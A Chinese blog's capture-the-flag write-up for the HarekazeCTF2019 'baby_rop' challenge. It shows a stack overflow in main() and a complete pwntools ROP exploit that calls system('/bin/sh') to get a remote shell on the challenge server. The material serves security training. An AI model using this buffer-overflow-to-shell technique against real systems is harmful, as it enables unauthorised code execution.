加载头像

[HarekazeCTF2019]baby_rop

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/[HarekazeCTF2019]baby_rop/babyrop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled		//栈不可执行
    PIE:      No PIE (0x400000)

IDA

main()

1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[16]; // [rsp+0h] [rbp-10h] BYREF

  system("echo -n \"What's your name? \"");		//system()调用
  __isoc99_scanf("%s", v4);
  printf("Welcome to the Pwn World, %s!\n", v4);	
  return 0;
}

可用字符串

.data:0000000000601048 00000008 C /bin/sh

system 0x400490

0x02

思路

s 0x10H
ebp 0x8
pop_rdi_ret
- bin_sh
system()

0x03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

# io = process(['./baby_rop'])
io = remote('node4.buuoj.cn', 28387)

padding = 0x10 + 0x8
system = 0x400490
pop_rdi_ret = 0x400683
bin_sh = 0x601048

payload = b'a' * padding + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
io.sendlineafter('e?', payload)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體